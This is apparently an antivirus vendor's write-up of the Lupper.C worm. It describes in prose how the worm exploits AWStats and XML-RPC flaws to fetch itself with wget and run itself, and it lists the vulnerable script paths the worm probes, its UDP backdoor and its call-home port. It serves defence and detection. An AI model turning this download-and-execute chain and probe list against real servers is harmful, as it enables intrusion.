Immediate Protection Info
| Signature | Product | Removal Instructions |
|---|
11.x/9504
| eTrust Antivirus v7/8* (Vet Engine)
| |
6.2x/9504
| eTrust EZ Antivirus 6.2x
| |
6.3x/9504
| eTrust EZ Antivirus 6.3x
| |
6.4x/9504
| eTrust EZ Antivirus 6.4x
| |
7.x/9504
| eTrust EZ Antivirus 7.x
| |
10.6x/9504
| Vet Anti-Virus 10.6x
| |
Description
Lupper.C is a worm designed to spread through web servers by exploiting two different security vulnerabilities. This variant has been distributed as 443,364-byte I386 ELF program.
Back to top
Method of Distribution
Via Exploits
Lupper attempts to execute a simple set of four commands on a remote server:
- Change folder to /tmp
- Use Wget to download a copy of the worm named “listen” from a particular hard-coded IP address
- Modify its execution attributes
- Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
/cgi-bin/awstats/awstats.pl
/cgi-bin/awstats.pl
/awstats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/drupal/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/xmlrpc.php
Back to top
Payload
Backdoor Functionality
Lupper.C opens a UDP backdoor on port 27105.
The worm can relay Internet traffic – i.e. act as a proxy.
Lupper.C can also update itself.
Back to top
For additional information:
The worm creates the file listen.log, which is used to keep the history of the worm execution and stores information like build number, worm actions, access errors etc.
The worm reports back to particular remote sites, sending data through UDP port 25555.
Analysis by Jakub Kaminski
Back to top